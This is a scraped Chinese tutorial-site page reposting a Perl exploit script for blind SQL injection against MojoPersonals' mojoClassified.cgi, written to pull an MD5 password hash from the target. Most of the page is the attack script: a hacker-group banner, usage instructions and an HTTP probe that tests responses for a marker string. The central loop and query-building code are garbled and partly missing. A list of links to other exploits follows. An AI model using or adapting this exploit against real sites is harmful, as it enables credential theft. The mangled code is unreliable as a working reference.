手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoPersonals Blind SQL Injection Exploit #n";

print " # (mojoClassified.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit】相关文章:

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit

win8本地安全策略常见问题解答

MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

avast无法卸载怎么办?

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

Autorun.inf U盘病毒手工解决方法

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

制作一个百毒不侵的系统 无需安装杀毒软件

初用瑞星杀毒软件网络版的注意事项

精品推荐
分类导航